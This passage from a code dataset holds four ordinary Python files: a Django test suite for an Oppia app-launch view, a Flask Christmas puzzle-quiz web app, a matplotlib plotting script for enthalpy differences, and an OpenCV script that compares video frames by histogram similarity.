"numpy.logical_xor", "line_number": 184, "usage_type": "call"}]} +{"seq_id": "20558654569", "text": "\nfrom django.urls import reverse\n\nfrom oppia.models import CourseStatus\nfrom oppia.test import OppiaTestCase\nfrom django.http import Http404\n\nfrom tests.utils import update_course_status\n\n\nclass AppLaunchActivityTest(OppiaTestCase):\n fixtures = ['tests/test_user.json',\n 'tests/test_oppia.json',\n 'tests/test_quiz.json',\n 'tests/test_permissions.json',\n 'tests/test_course_permissions.json']\n\n STR_LAUNCHER_TEMPLATE = 'course/app_launcher.html'\n STR_URL_REDIRECT = 'oppia:app_launch_activity_redirect'\n valid_digest = '11cc12291f730160c324b727dd2268b612137'\n invalid_digest = '1ab2c3d4e5f6'\n valid_course = 'anc1-all'\n invalid_course = 'mycourse'\n\n # all users should be able to access without logging in\n def test_access_valid_digest(self):\n url = ('%s?digest=' + self.valid_digest) \\\n % reverse(self.STR_URL_REDIRECT)\n response = self.client.get(url)\n self.assertTemplateUsed(response, self.STR_LAUNCHER_TEMPLATE)\n self.assertEqual(200, response.status_code)\n\n def test_access_no_digest(self):\n url = reverse(self.STR_URL_REDIRECT)\n response = self.client.get(url)\n self.assertRaises(ValueError)\n self.assertTemplateUsed(response, self.STR_LAUNCHER_TEMPLATE)\n self.assertEqual(200, response.status_code)\n\n def test_access_invalid_digest(self):\n url = ('%s?digest=' + self.invalid_digest) \\\n % reverse(self.STR_URL_REDIRECT)\n response = self.client.get(url)\n self.assertTemplateUsed(response, self.STR_LAUNCHER_TEMPLATE)\n self.assertEqual(200, response.status_code)\n\n def test_access_valid_course(self):\n url = ('%s?course=' + self.valid_course) \\\n % reverse(self.STR_URL_REDIRECT)\n response = self.client.get(url)\n self.assertTemplateUsed(response, self.STR_LAUNCHER_TEMPLATE)\n self.assertEqual(200, response.status_code)\n\n def test_access_invalid_course(self):\n url = ('%s?course=' + self.invalid_course) \\\n % reverse(self.STR_URL_REDIRECT)\n response = self.client.get(url)\n self.assertTemplateUsed(response, self.STR_LAUNCHER_TEMPLATE)\n self.assertEqual(200, response.status_code)\n\n def test_no_access_for_draft_course(self):\n url = ('%s?course=' + self.valid_course) \\\n % reverse(self.STR_URL_REDIRECT)\n update_course_status(1, CourseStatus.DRAFT)\n response = self.client.get(url)\n self.assertRaises(Http404)\n self.assertTemplateUsed(response, self.STR_LAUNCHER_TEMPLATE)\n self.assertEqual(200, response.status_code)\n update_course_status(1, CourseStatus.LIVE)\n", "repo_name": "DigitalCampus/django-oppia", "sub_path": "tests/oppia/views/test_app_launch_activity.py", "file_name": "test_app_launch_activity.py", "file_ext": "py", "file_size_in_byte": 2719, "program_lang": "python", "lang": "en", "doc_type": "code", "stars": 17, "dataset": "github-code", "pt": "53", "api": [{"api_name": "oppia.test.OppiaTestCase", "line_number": 11, "usage_type": "name"}, {"api_name": "django.urls.reverse", "line_number": 28, "usage_type": "call"}, {"api_name": "django.urls.reverse", "line_number": 34, "usage_type": "call"}, {"api_name": "django.urls.reverse", "line_number": 42, "usage_type": "call"}, {"api_name": "django.urls.reverse", "line_number": 49, "usage_type": "call"}, {"api_name": "django.urls.reverse", "line_number": 56, "usage_type": "call"}, {"api_name": "django.urls.reverse", "line_number": 63, "usage_type": "call"}, {"api_name": "tests.utils.update_course_status", "line_number": 64, "usage_type": "call"}, {"api_name": "oppia.models.CourseStatus.DRAFT", 
"line_number": 64, "usage_type": "attribute"}, {"api_name": "oppia.models.CourseStatus", "line_number": 64, "usage_type": "name"}, {"api_name": "django.http.Http404", "line_number": 66, "usage_type": "argument"}, {"api_name": "tests.utils.update_course_status", "line_number": 69, "usage_type": "call"}, {"api_name": "oppia.models.CourseStatus.LIVE", "line_number": 69, "usage_type": "attribute"}, {"api_name": "oppia.models.CourseStatus", "line_number": 69, "usage_type": "name"}]} +{"seq_id": "30547087142", "text": "import datetime\r\nimport random\r\nimport re\r\nimport string\r\n\r\nfrom bs4 import BeautifulSoup\r\nfrom flask import Flask\r\nfrom flask import redirect\r\nfrom flask import render_template\r\nfrom flask import request\r\nfrom flask import session\r\nfrom flask import url_for\r\nfrom flask_mail import Mail\r\nfrom flask_mail import Message\r\nfrom flask_session import Session\r\nimport requests\r\n\r\napp = Flask(__name__)\r\napp.secret_key = b'_5#y2L\"F4Q8z\\n\\xec]/'\r\napp.config['SESSION_TYPE'] = 'filesystem'\r\nSession(app)\r\nmail = Mail(app)\r\n\r\n\r\nSTRING_OPTIONS = string.ascii_uppercase + string.ascii_lowercase + string.digits\r\n\r\ndef random_string():\r\n return ''.join(random.choices(STRING_OPTIONS, k=100))\r\n\r\nq11_string = random_string()\r\nq11_datetime = datetime.datetime.now()\r\n\r\n\r\n@app.route('/')\r\ndef index():\r\n return render_template('1.html')\r\n\r\n@app.route('/2/')\r\ndef two():\r\n return 'Now go to the next page.'\r\n\r\n@app.route('/3/')\r\ndef three():\r\n return render_template('3.html')\r\n\r\n@app.route('/4/')\r\ndef four():\r\n volume = request.args.get('volume')\r\n if volume in ('11', 'eleven'):\r\n return 'Correct. Move on the next question by subtracting its number from 37.'\r\n if volume == 'quiet':\r\n return \"I can't hear you.\"\r\n if volume == 'loud':\r\n return \"That's better, but let's go full Spinal Tap for the win.\"\r\n if volume:\r\n return 'Eh?'\r\n if not volume:\r\n return \"No I don't think that's going to work.\"\r\n\r\n@app.route('/6/')\r\ndef six():\r\n return \"No cheating just like that.\"\r\n\r\n@app.route('/7/')\r\ndef seven():\r\n return \"No cheating just like that.\"\r\n\r\n@app.route('/8/')\r\ndef eight():\r\n return \"No cheating just like that.\"\r\n\r\n\r\n@app.route('/32/')\r\ndef q5():\r\n return render_template('q5.html')\r\n\r\n@app.route('/2398u4qesfhoiasdhf9a8sdyr983ruiwheasuhdiausdhf/')\r\ndef q5_question():\r\n if 'count' in session:\r\n session['count'] += 1\r\n else:\r\n session['count'] = 0\r\n \r\n if session['count'] == 13:\r\n session.clear()\r\n return render_template('q5-correct.html')\r\n return render_template('q5-question.html')\r\n\r\n@app.route('/29uqwoenrqwkehjr0384uho3u4ihj3odfgsdfgisdufgoi/', methods=['GET'])\r\ndef q6_question():\r\n return render_template('q6-question.html')\r\n\r\n@app.route('/29uqwoenrqwkehjr0384uho3u4ihj3odfgsdfgisdufgoi/', methods=['POST'])\r\ndef q6_question_submit():\r\n if 'answer' in request.form and request.form['answer'] == '60c6fa6f0974eb79069d1391dbd850f3e16b265e':\r\n return render_template('q6-correct.html')\r\n\r\n return render_template('q6-question.html', message=\"No, I don't think so.\")\r\n\r\n@app.route('/oi4j563ioj12iu34h1i2u3hv4k1j3k513hg5234h5i234uh5i2/', methods=['GET'])\r\ndef q7_question():\r\n return render_template('q7-question.html')\r\n\r\n@app.route('/oi4j563ioj12iu34h1i2u3hv4k1j3k513hg5234h5i234uh5i2/', methods=['DELETE'])\r\ndef q7_question_submit():\r\n return 'Very good. 
Now load {} (in your browser is fine)'.format(url_for('q8', _external=True))\r\n\r\n@app.route('/94859dgksjdfhgo324uy5235gbjhasdfh34h5k34jh53k4jh5wu/', methods=['GET'])\r\ndef q8():\r\n return render_template('q8-question.html')\r\n\r\n\r\n@app.route('/94859dgksjdfhgo324uy5235gbjhasdfh34h5k34jh53k4jh5wu/', methods=['POST'])\r\ndef q8_submit():\r\n if 'answer' in request.form:\r\n if request.form['answer'] == '260549':\r\n return render_template('q8-correct.html')\r\n\r\n if re.match(r'[\\dABCDEF]{6}', request.form['answer']):\r\n\r\n return render_template('q8-question.html', colour=request.form['answer'])\r\n else:\r\n return render_template('q8-question.html', gibberish=True)\r\n\r\n else:\r\n return render_template('q8-question.html')\r\n\r\n@app.route('/gfhc6i765ic5645365edhgfhgdsdtrs54ew54wsgvfkuty78t87t/')\r\ndef q9():\r\n return render_template('q9.html')\r\n\r\n@app.route('/aksljdfwiejroisjdfoasidhfoasiuhdfaioushdfoasidfjoaisdjf/')\r\ndef q9_correct():\r\n return render_template('q9-correct.html')\r\n\r\n@app.route('/23u4qwehnlkasdjf09uw34riasheoirh23k4j5ki34h5234h5k23j4h5/')\r\ndef q10():\r\n if 'Trident' in request.headers['user-agent']:\r\n return render_template('q10-correct.html', answer_string=q11_string)\r\n return render_template('q10-question.html')\r\n\r\n\r\n@app.route('/return-to-sender-really-quickly/')\r\ndef q11():\r\n global q11_string\r\n global q11_datetime\r\n if request.args.get('answer') and request.args.get('answer') == q11_string \\\r\n and (datetime.datetime.now() - q11_datetime) < datetime.timedelta(seconds=15): ## Change time to something suitable!\r\n\r\n q11_datetime = datetime.datetime.now()\r\n q11_string = random_string()\r\n\r\n return 'HERE IT IS: {}'.format(url_for('q12', _external=True))\r\n\r\n q11_string = random_string()\r\n g11_datetime = datetime.datetime.now()\r\n\r\n return q11_string\r\n \r\n\r\n@app.route('/aosidfjoijwernhkwerobisdfoghj34itjh345jhwoiu45y35/', methods=['GET', 'POST'])\r\ndef q12():\r\n if 'mstring' not in session:\r\n session['mstring'] = ''\r\n\r\n if 'input' not in request.form:\r\n return render_template('q12-question.html', mstring=session['mstring'])\r\n\r\n input_value = request.form['input']\r\n\r\n if not re.match(r'(https?:\\/\\/)?(www\\.)?[-a-zA-Z0-9@:%._\\+~#=]{2,256}\\.[a-z]{2,6}\\b([-a-zA-Z0-9@:%_\\+.~#?&//=]*)', input_value):\r\n return render_template('q12-question.html', mstring=session['mstring'], message=\"That's not gonna work!\")\r\n\r\n if 'wikipedia.org' not in input_value:\r\n return render_template('q12-question.html', mstring=session['mstring'], message=\"It's the right idea, but you need a certain 'Hawaiian velocity'?!\")\r\n\r\n \r\n if re.search(r'wikipedia.org\\/wiki\\/\\w{1}$', input_value):\r\n return render_template('q12-question.html', mstring=session['mstring'], message=\"No triviality...\")\r\n\r\n\r\n resp = requests.get(input_value)\r\n\r\n if resp.status_code != 200:\r\n return render_template('q12-question.html', mstring=session['mstring'], message=\"Something bad with that one...\")\r\n\r\n soup = BeautifulSoup(resp.text, 'html.parser')\r\n title_string = soup.title.string\r\n\r\n if title_string.lower().startswith('space'):\r\n session['mstring'] += ' '\r\n return render_template('q12-question.html', mstring=session['mstring'], message=\"You discovered the spacebar!\")\r\n\r\n if title_string.lower().startswith('delete'):\r\n if len(session['mstring']) > 0:\r\n session['mstring'] = session['mstring'][:-1]\r\n return render_template('q12-question.html', mstring=session['mstring'], 
message=\"You discovered backspace!\")\r\n\r\n\r\n char = title_string[0].lower()\r\n session['mstring'] += char\r\n\r\n if session['mstring'] in ('merry christmas', 'happy christmas', 'happy xmas'):\r\n return redirect(url_for('win'))\r\n\r\n\r\n print(\"'\" + session['mstring'] + \"'\")\r\n return render_template('q12-question.html', mstring=session['mstring'], message=\"Voilà. Keep going!\")\r\n \r\n\r\n@app.route('/onthefirstdayofchristmasmytruelovegavetomeonenicelovelypintofbeerandacoupleofpacketsofcrisps/', methods=['GET', 'POST'])\r\ndef win():\r\n if 'name' in request.form:\r\n msg = Message(\"Quiz winner!\",\r\n sender=\"from@xmasquiz.ed.ac.uk\",\r\n recipients=[\"richard.hadden@ed.ac.uk\"])\r\n msg.body = '{} has won the quiz!'.format(request.form['name'])\r\n mail.send(msg)\r\n return render_template('win.html', show_form=False)\r\n\r\n return render_template('win.html', show_form=True)\r\n\r\n\r\n\r\n@app.errorhandler(404)\r\ndef page_not_found(e):\r\n return \"It looks like that didn't work. Try hitting back.\"\r\n\r\n\r\n\r\n\r\n\r\n\r\n\r\nif __name__ == '__main__':\r\n app.run(debug=True)", "repo_name": "oculardexterity/xmasquiz", "sub_path": "app.py", "file_name": "app.py", "file_ext": "py", "file_size_in_byte": 7634, "program_lang": "python", "lang": "en", "doc_type": "code", "stars": 0, "dataset": "github-code", "pt": "53", "api": [{"api_name": "flask.Flask", "line_number": 18, "usage_type": "call"}, {"api_name": "flask_session.Session", "line_number": 21, "usage_type": "call"}, {"api_name": "flask_mail.Mail", "line_number": 22, "usage_type": "call"}, {"api_name": "string.ascii_uppercase", "line_number": 25, "usage_type": "attribute"}, {"api_name": "string.ascii_lowercase", "line_number": 25, "usage_type": "attribute"}, {"api_name": "string.digits", "line_number": 25, "usage_type": "attribute"}, {"api_name": "random.choices", "line_number": 28, "usage_type": "call"}, {"api_name": "datetime.datetime.now", "line_number": 31, "usage_type": "call"}, {"api_name": "datetime.datetime", "line_number": 31, "usage_type": "attribute"}, {"api_name": "flask.render_template", "line_number": 36, "usage_type": "call"}, {"api_name": "flask.render_template", "line_number": 44, "usage_type": "call"}, {"api_name": "flask.request.args.get", "line_number": 48, "usage_type": "call"}, {"api_name": "flask.request.args", "line_number": 48, "usage_type": "attribute"}, {"api_name": "flask.request", "line_number": 48, "usage_type": "name"}, {"api_name": "flask.render_template", "line_number": 75, "usage_type": "call"}, {"api_name": "flask.session", "line_number": 79, "usage_type": "name"}, {"api_name": "flask.session", "line_number": 80, "usage_type": "name"}, {"api_name": "flask.session", "line_number": 82, "usage_type": "name"}, {"api_name": "flask.session", "line_number": 84, "usage_type": "name"}, {"api_name": "flask.session.clear", "line_number": 85, "usage_type": "call"}, {"api_name": "flask.session", "line_number": 85, "usage_type": "name"}, {"api_name": "flask.render_template", "line_number": 86, "usage_type": "call"}, {"api_name": "flask.render_template", "line_number": 87, "usage_type": "call"}, {"api_name": "flask.render_template", "line_number": 91, "usage_type": "call"}, {"api_name": "flask.request.form", "line_number": 95, "usage_type": "attribute"}, {"api_name": "flask.request", "line_number": 95, "usage_type": "name"}, {"api_name": "flask.render_template", "line_number": 96, "usage_type": "call"}, {"api_name": "flask.render_template", "line_number": 98, "usage_type": "call"}, 
{"api_name": "flask.render_template", "line_number": 102, "usage_type": "call"}, {"api_name": "flask.url_for", "line_number": 106, "usage_type": "call"}, {"api_name": "flask.render_template", "line_number": 110, "usage_type": "call"}, {"api_name": "flask.request.form", "line_number": 115, "usage_type": "attribute"}, {"api_name": "flask.request", "line_number": 115, "usage_type": "name"}, {"api_name": "flask.request.form", "line_number": 116, "usage_type": "attribute"}, {"api_name": "flask.request", "line_number": 116, "usage_type": "name"}, {"api_name": "flask.render_template", "line_number": 117, "usage_type": "call"}, {"api_name": "re.match", "line_number": 119, "usage_type": "call"}, {"api_name": "flask.request.form", "line_number": 119, "usage_type": "attribute"}, {"api_name": "flask.request", "line_number": 119, "usage_type": "name"}, {"api_name": "flask.render_template", "line_number": 121, "usage_type": "call"}, {"api_name": "flask.request.form", "line_number": 121, "usage_type": "attribute"}, {"api_name": "flask.request", "line_number": 121, "usage_type": "name"}, {"api_name": "flask.render_template", "line_number": 123, "usage_type": "call"}, {"api_name": "flask.render_template", "line_number": 126, "usage_type": "call"}, {"api_name": "flask.render_template", "line_number": 130, "usage_type": "call"}, {"api_name": "flask.render_template", "line_number": 134, "usage_type": "call"}, {"api_name": "flask.request.headers", "line_number": 138, "usage_type": "attribute"}, {"api_name": "flask.request", "line_number": 138, "usage_type": "name"}, {"api_name": "flask.render_template", "line_number": 139, "usage_type": "call"}, {"api_name": "flask.render_template", "line_number": 140, "usage_type": "call"}, {"api_name": "flask.request.args.get", "line_number": 147, "usage_type": "call"}, {"api_name": "flask.request.args", "line_number": 147, "usage_type": "attribute"}, {"api_name": "flask.request", "line_number": 147, "usage_type": "name"}, {"api_name": "datetime.datetime.now", "line_number": 148, "usage_type": "call"}, {"api_name": "datetime.datetime", "line_number": 148, "usage_type": "attribute"}, {"api_name": "datetime.timedelta", "line_number": 148, "usage_type": "call"}, {"api_name": "datetime.datetime.now", "line_number": 150, "usage_type": "call"}, {"api_name": "datetime.datetime", "line_number": 150, "usage_type": "attribute"}, {"api_name": "flask.url_for", "line_number": 153, "usage_type": "call"}, {"api_name": "datetime.datetime.now", "line_number": 156, "usage_type": "call"}, {"api_name": "datetime.datetime", "line_number": 156, "usage_type": "attribute"}, {"api_name": "flask.session", "line_number": 163, "usage_type": "name"}, {"api_name": "flask.session", "line_number": 164, "usage_type": "name"}, {"api_name": "flask.request.form", "line_number": 166, "usage_type": "attribute"}, {"api_name": "flask.request", "line_number": 166, "usage_type": "name"}, {"api_name": "flask.render_template", "line_number": 167, "usage_type": "call"}, {"api_name": "flask.session", "line_number": 167, "usage_type": "name"}, {"api_name": "flask.request.form", "line_number": 169, "usage_type": "attribute"}, {"api_name": "flask.request", "line_number": 169, "usage_type": "name"}, {"api_name": "re.match", "line_number": 171, "usage_type": "call"}, {"api_name": "flask.render_template", "line_number": 172, "usage_type": "call"}, {"api_name": "flask.session", "line_number": 172, "usage_type": "name"}, {"api_name": "flask.render_template", "line_number": 175, "usage_type": "call"}, {"api_name": 
"flask.session", "line_number": 175, "usage_type": "name"}, {"api_name": "re.search", "line_number": 178, "usage_type": "call"}, {"api_name": "flask.render_template", "line_number": 179, "usage_type": "call"}, {"api_name": "flask.session", "line_number": 179, "usage_type": "name"}, {"api_name": "requests.get", "line_number": 182, "usage_type": "call"}, {"api_name": "flask.render_template", "line_number": 185, "usage_type": "call"}, {"api_name": "flask.session", "line_number": 185, "usage_type": "name"}, {"api_name": "bs4.BeautifulSoup", "line_number": 187, "usage_type": "call"}, {"api_name": "flask.session", "line_number": 191, "usage_type": "name"}, {"api_name": "flask.render_template", "line_number": 192, "usage_type": "call"}, {"api_name": "flask.session", "line_number": 192, "usage_type": "name"}, {"api_name": "flask.session", "line_number": 195, "usage_type": "name"}, {"api_name": "flask.session", "line_number": 196, "usage_type": "name"}, {"api_name": "flask.render_template", "line_number": 197, "usage_type": "call"}, {"api_name": "flask.session", "line_number": 197, "usage_type": "name"}, {"api_name": "flask.session", "line_number": 201, "usage_type": "name"}, {"api_name": "flask.session", "line_number": 203, "usage_type": "name"}, {"api_name": "flask.redirect", "line_number": 204, "usage_type": "call"}, {"api_name": "flask.url_for", "line_number": 204, "usage_type": "call"}, {"api_name": "flask.session", "line_number": 207, "usage_type": "name"}, {"api_name": "flask.render_template", "line_number": 208, "usage_type": "call"}, {"api_name": "flask.session", "line_number": 208, "usage_type": "name"}, {"api_name": "flask.request.form", "line_number": 213, "usage_type": "attribute"}, {"api_name": "flask.request", "line_number": 213, "usage_type": "name"}, {"api_name": "flask_mail.Message", "line_number": 214, "usage_type": "call"}, {"api_name": "flask.request.form", "line_number": 217, "usage_type": "attribute"}, {"api_name": "flask.request", "line_number": 217, "usage_type": "name"}, {"api_name": "flask.render_template", "line_number": 219, "usage_type": "call"}, {"api_name": "flask.render_template", "line_number": 221, "usage_type": "call"}]} +{"seq_id": "72428288489", "text": "\nimport numpy as np\nimport pandas as pd\nimport matplotlib.pyplot as plt\nimport matplotlib.gridspec as gridspec\n\nplt.rcParams['figure.figsize'] = (7, 6)\nplt.rcParams['axes.linewidth'] = 3\nplt.rc('xtick', labelsize=18)\nplt.rc('ytick', labelsize=18)\nplt.rc('axes', labelsize=18)\nplt.rc('legend', fontsize=16)\nplt.rcParams['lines.markersize'] = 10\nplt.rcParams['lines.linewidth'] = 3\nplt.rcParams['xtick.direction'] = 'in'\nplt.rcParams['ytick.direction'] = 'in'\nplt.rcParams['xtick.major.size'] = 10\nplt.rcParams['xtick.major.width'] = 2\nplt.rcParams['ytick.major.size'] = 10\nplt.rcParams['ytick.major.width'] = 2\nplt.rcParams['legend.edgecolor'] = 'k'\nplt.rcParams['axes.unicode_minus'] = False\nplt.rcParams[\"legend.framealpha\"] = 1\nplt.rcParams['xtick.major.pad'] = 8\nplt.rcParams['ytick.major.pad'] = 8\nplt.rcParams['legend.handletextpad'] = 0.2\nplt.rcParams['legend.columnspacing'] = 0.1\nplt.rcParams['legend.labelspacing'] = 0.1\nplt.rcParams['legend.title_fontsize'] = 14\nplt.rcParams['axes.formatter.limits'] = (-3, 6)\n\n\ncolormap = plt.cm.Dark2\ncolors = [colormap(i) for i in np.linspace(0, 1, 4)]\n\ngs = gridspec.GridSpec(nrows=1, ncols=1)\ngs.update(wspace=0.4, hspace=0.4)\n\nax0 = plt.subplot(gs[0, 
0])\n\nold_hf_CHCH=12.8\nhf_CH_singlebond_CH=np.array([97.3,62.3])\nhf_CH_doublebond_CH=np.array([10.5,79.8])\n\nold_hf_CCH=128.0\nhf_C_doublebond_CH=np.array([173.5, 10.5])\nhf_C_singlebond_CH=np.array([156.9,-79.6])\n\nold_hf_CC=210.4\nhf_C_doublebond_C=np.array([303.7,-26.0])\nhf_C_singlebond_C=np.array([183.5,-188.5])\n\nno=[0,1,2]\n\nax0.set_xlim([-0.5,2.5])\nax0.set_ylim([-40,100])\nax0.set_ylabel('$\\mathrm{\\Delta\\Delta_fH\\ (kJ\\,mol^{-1})}$') \nax0.set_xticks([0,1,2])\nax0.set_xticklabels(['$\\mathrm{^*CH^*CH}$','$\\mathrm{^*C^*CH}$','$\\mathrm{^*C^*C}$'])\n#ax0.legend()\n\nax0.plot((-0.5,3),(0,0),linestyle='solid',color='k')\n\n#ax0.bar(no[0],old_hf_CHCH, width=0.2,color=colors[0], edgecolor='k', label='$\\mathrm{\\overline{|\\Delta\\Delta_fH|}}$')\nax0.bar(no[0]-0.1,hf_CH_singlebond_CH[0]-old_hf_CHCH, width=0.2,color=colors[0], edgecolor='k', label='$\\mathrm{\\overline{|\\Delta\\Delta_fH|}}$')\nax0.bar(no[0]+0.1,hf_CH_doublebond_CH[0]-old_hf_CHCH, width=0.2,color=colors[0], edgecolor='k', label='$\\mathrm{\\overline{|\\Delta\\Delta_fH|}}$')\n\n\n\n#ax0.bar(no[1],old_hf_CCH, width=0.2,color=colors[1], edgecolor='k', label='$\\mathrm{\\overline{|\\Delta\\Delta_fH|}}$')\nax0.bar(no[1]-0.1,hf_C_doublebond_CH[0]-old_hf_CCH, width=0.2,color=colors[1], edgecolor='k', label='$\\mathrm{\\overline{|\\Delta\\Delta_fH|}}$')\nax0.bar(no[1]+0.1,hf_C_singlebond_CH[0]-old_hf_CCH, width=0.2,color=colors[1], edgecolor='k', label='$\\mathrm{\\overline{|\\Delta\\Delta_fH|}}$')\n\n#ax0.bar(no[2],old_hf_CC, width=0.2,color=colors[2], edgecolor='k', label='$\\mathrm{\\overline{|\\Delta\\Delta_fH|}}$')\nax0.bar(no[2]-0.1,hf_C_doublebond_C[0]-old_hf_CC, width=0.2,color=colors[2], edgecolor='k', label='$\\mathrm{\\overline{|\\Delta\\Delta_fH|}}$')\nax0.bar(no[2]+0.1,hf_C_singlebond_C[0]-old_hf_CC, width=0.2,color=colors[2], edgecolor='k', label='$\\mathrm{\\overline{|\\Delta\\Delta_fH|}}$')\n\nplt.savefig('resonance.pdf', bbox_inches='tight',transparent=False)", "repo_name": "bjkreitz/CBH-thermo", "sub_path": "Figures/resonance.py", "file_name": "resonance.py", "file_ext": "py", "file_size_in_byte": 3100, "program_lang": "python", "lang": "en", "doc_type": "code", "stars": 0, "dataset": "github-code", "pt": "53", "api": [{"api_name": "matplotlib.pyplot.rcParams", "line_number": 7, "usage_type": "attribute"}, {"api_name": "matplotlib.pyplot", "line_number": 7, "usage_type": "name"}, {"api_name": "matplotlib.pyplot.rcParams", "line_number": 8, "usage_type": "attribute"}, {"api_name": "matplotlib.pyplot", "line_number": 8, "usage_type": "name"}, {"api_name": "matplotlib.pyplot.rc", "line_number": 9, "usage_type": "call"}, {"api_name": "matplotlib.pyplot", "line_number": 9, "usage_type": "name"}, {"api_name": "matplotlib.pyplot.rc", "line_number": 10, "usage_type": "call"}, {"api_name": "matplotlib.pyplot", "line_number": 10, "usage_type": "name"}, {"api_name": "matplotlib.pyplot.rc", "line_number": 11, "usage_type": "call"}, {"api_name": "matplotlib.pyplot", "line_number": 11, "usage_type": "name"}, {"api_name": "matplotlib.pyplot.rc", "line_number": 12, "usage_type": "call"}, {"api_name": "matplotlib.pyplot", "line_number": 12, "usage_type": "name"}, {"api_name": "matplotlib.pyplot.rcParams", "line_number": 13, "usage_type": "attribute"}, {"api_name": "matplotlib.pyplot", "line_number": 13, "usage_type": "name"}, {"api_name": "matplotlib.pyplot.rcParams", "line_number": 14, "usage_type": "attribute"}, {"api_name": "matplotlib.pyplot", "line_number": 14, "usage_type": "name"}, {"api_name": 
"matplotlib.pyplot.rcParams", "line_number": 15, "usage_type": "attribute"}, {"api_name": "matplotlib.pyplot", "line_number": 15, "usage_type": "name"}, {"api_name": "matplotlib.pyplot.rcParams", "line_number": 16, "usage_type": "attribute"}, {"api_name": "matplotlib.pyplot", "line_number": 16, "usage_type": "name"}, {"api_name": "matplotlib.pyplot.rcParams", "line_number": 17, "usage_type": "attribute"}, {"api_name": "matplotlib.pyplot", "line_number": 17, "usage_type": "name"}, {"api_name": "matplotlib.pyplot.rcParams", "line_number": 18, "usage_type": "attribute"}, {"api_name": "matplotlib.pyplot", "line_number": 18, "usage_type": "name"}, {"api_name": "matplotlib.pyplot.rcParams", "line_number": 19, "usage_type": "attribute"}, {"api_name": "matplotlib.pyplot", "line_number": 19, "usage_type": "name"}, {"api_name": "matplotlib.pyplot.rcParams", "line_number": 20, "usage_type": "attribute"}, {"api_name": "matplotlib.pyplot", "line_number": 20, "usage_type": "name"}, {"api_name": "matplotlib.pyplot.rcParams", "line_number": 21, "usage_type": "attribute"}, {"api_name": "matplotlib.pyplot", "line_number": 21, "usage_type": "name"}, {"api_name": "matplotlib.pyplot.rcParams", "line_number": 22, "usage_type": "attribute"}, {"api_name": "matplotlib.pyplot", "line_number": 22, "usage_type": "name"}, {"api_name": "matplotlib.pyplot.rcParams", "line_number": 23, "usage_type": "attribute"}, {"api_name": "matplotlib.pyplot", "line_number": 23, "usage_type": "name"}, {"api_name": "matplotlib.pyplot.rcParams", "line_number": 24, "usage_type": "attribute"}, {"api_name": "matplotlib.pyplot", "line_number": 24, "usage_type": "name"}, {"api_name": "matplotlib.pyplot.rcParams", "line_number": 25, "usage_type": "attribute"}, {"api_name": "matplotlib.pyplot", "line_number": 25, "usage_type": "name"}, {"api_name": "matplotlib.pyplot.rcParams", "line_number": 26, "usage_type": "attribute"}, {"api_name": "matplotlib.pyplot", "line_number": 26, "usage_type": "name"}, {"api_name": "matplotlib.pyplot.rcParams", "line_number": 27, "usage_type": "attribute"}, {"api_name": "matplotlib.pyplot", "line_number": 27, "usage_type": "name"}, {"api_name": "matplotlib.pyplot.rcParams", "line_number": 28, "usage_type": "attribute"}, {"api_name": "matplotlib.pyplot", "line_number": 28, "usage_type": "name"}, {"api_name": "matplotlib.pyplot.rcParams", "line_number": 29, "usage_type": "attribute"}, {"api_name": "matplotlib.pyplot", "line_number": 29, "usage_type": "name"}, {"api_name": "matplotlib.pyplot.rcParams", "line_number": 30, "usage_type": "attribute"}, {"api_name": "matplotlib.pyplot", "line_number": 30, "usage_type": "name"}, {"api_name": "matplotlib.pyplot.cm", "line_number": 33, "usage_type": "attribute"}, {"api_name": "matplotlib.pyplot", "line_number": 33, "usage_type": "name"}, {"api_name": "numpy.linspace", "line_number": 34, "usage_type": "call"}, {"api_name": "matplotlib.gridspec.GridSpec", "line_number": 36, "usage_type": "call"}, {"api_name": "matplotlib.gridspec", "line_number": 36, "usage_type": "name"}, {"api_name": "matplotlib.pyplot.subplot", "line_number": 39, "usage_type": "call"}, {"api_name": "matplotlib.pyplot", "line_number": 39, "usage_type": "name"}, {"api_name": "numpy.array", "line_number": 42, "usage_type": "call"}, {"api_name": "numpy.array", "line_number": 43, "usage_type": "call"}, {"api_name": "numpy.array", "line_number": 46, "usage_type": "call"}, {"api_name": "numpy.array", "line_number": 47, "usage_type": "call"}, {"api_name": "numpy.array", "line_number": 50, "usage_type": "call"}, 
{"api_name": "numpy.array", "line_number": 51, "usage_type": "call"}, {"api_name": "matplotlib.pyplot.savefig", "line_number": 78, "usage_type": "call"}, {"api_name": "matplotlib.pyplot", "line_number": 78, "usage_type": "name"}]} +{"seq_id": "15571120079", "text": "import os\nimport shutil\nimport sys\nimport cv2\nfrom PIL import Image\n\ndef gethist(im):\n res_hist = cv2.calcHist([im], [0, 1, 2], None, [8, 8, 8], [0, 256, 0, 256, 0, 256])\n res_hist = cv2.normalize(res_hist, res_hist).flatten()\n return res_hist\n\ndef get_hist_sim(im1, im2):\n hist1 = gethist(im1)\n hist2 = gethist(im2)\n\n return cv2.compareHist(hist1, hist2, cv2.HISTCMP_CORREL) # higher == more similar\n\ndef main():\n if len(sys.argv) < 3:\n print(\"Wrong syntax\")\n return\n in_file = sys.argv[1]\n foldername = sys.argv[2]\n # print(f'{in_file = } \\t {foldername = }')\n cmpimg = cv2.imread(in_file)\n # print('reading in_file image complete!')\n for imgfilename in sorted(os.listdir(foldername), key=lambda x: int(x.removeprefix('frame').removesuffix('.jpg'))):\n im2 = cv2.imread(os.path.join(foldername, imgfilename))\n # print(f'reading {imgfilename} image complete!')\n sim = get_hist_sim(cmpimg, im2)\n print(f'Similarity between {in_file} and {imgfilename} is %.4f' % sim)\n\n\nTHRESHOLD = 0.6\ndef main2():\n pth = 'BigTests'\n fldrs = [ os.path.join(pth, f) for f in os.listdir(pth) ]\n\n for foldername in fldrs:\n li = os.listdir(foldername)\n fldrs2 = [ os.path.join(foldername, x) for x in li ]\n chkimg = list(filter(lambda x: '.jpg' in x, fldrs2))[0]\n im = cv2.imread(chkimg)\n for fld in fldrs2:\n if '.jpg' not in fld:\n fldrs3 = [ os.path.join(fld, y) for y in os.listdir(fld) ]\n for imm in fldrs3:\n im2 = cv2.imread(imm)\n if im is not None:\n if get_hist_sim(im, im2) > THRESHOLD:\n print(f'Removing {imm}')\n try:\n # hardcoded as of now\n shutil.move(imm, './toremove')\n except Exception as e:\n os.system('del /Q toremove')\n shutil.move(imm, './toremove')\n else:\n print('[error] im is None')\n \n\n\nif __name__ == '__main__':\n main()", "repo_name": "Elwin-J/Vid-Slide-Extractor", "sub_path": "imgcmpfolder.py", "file_name": "imgcmpfolder.py", "file_ext": "py", "file_size_in_byte": 2202, "program_lang": "python", "lang": "en", "doc_type": "code", "stars": 0, 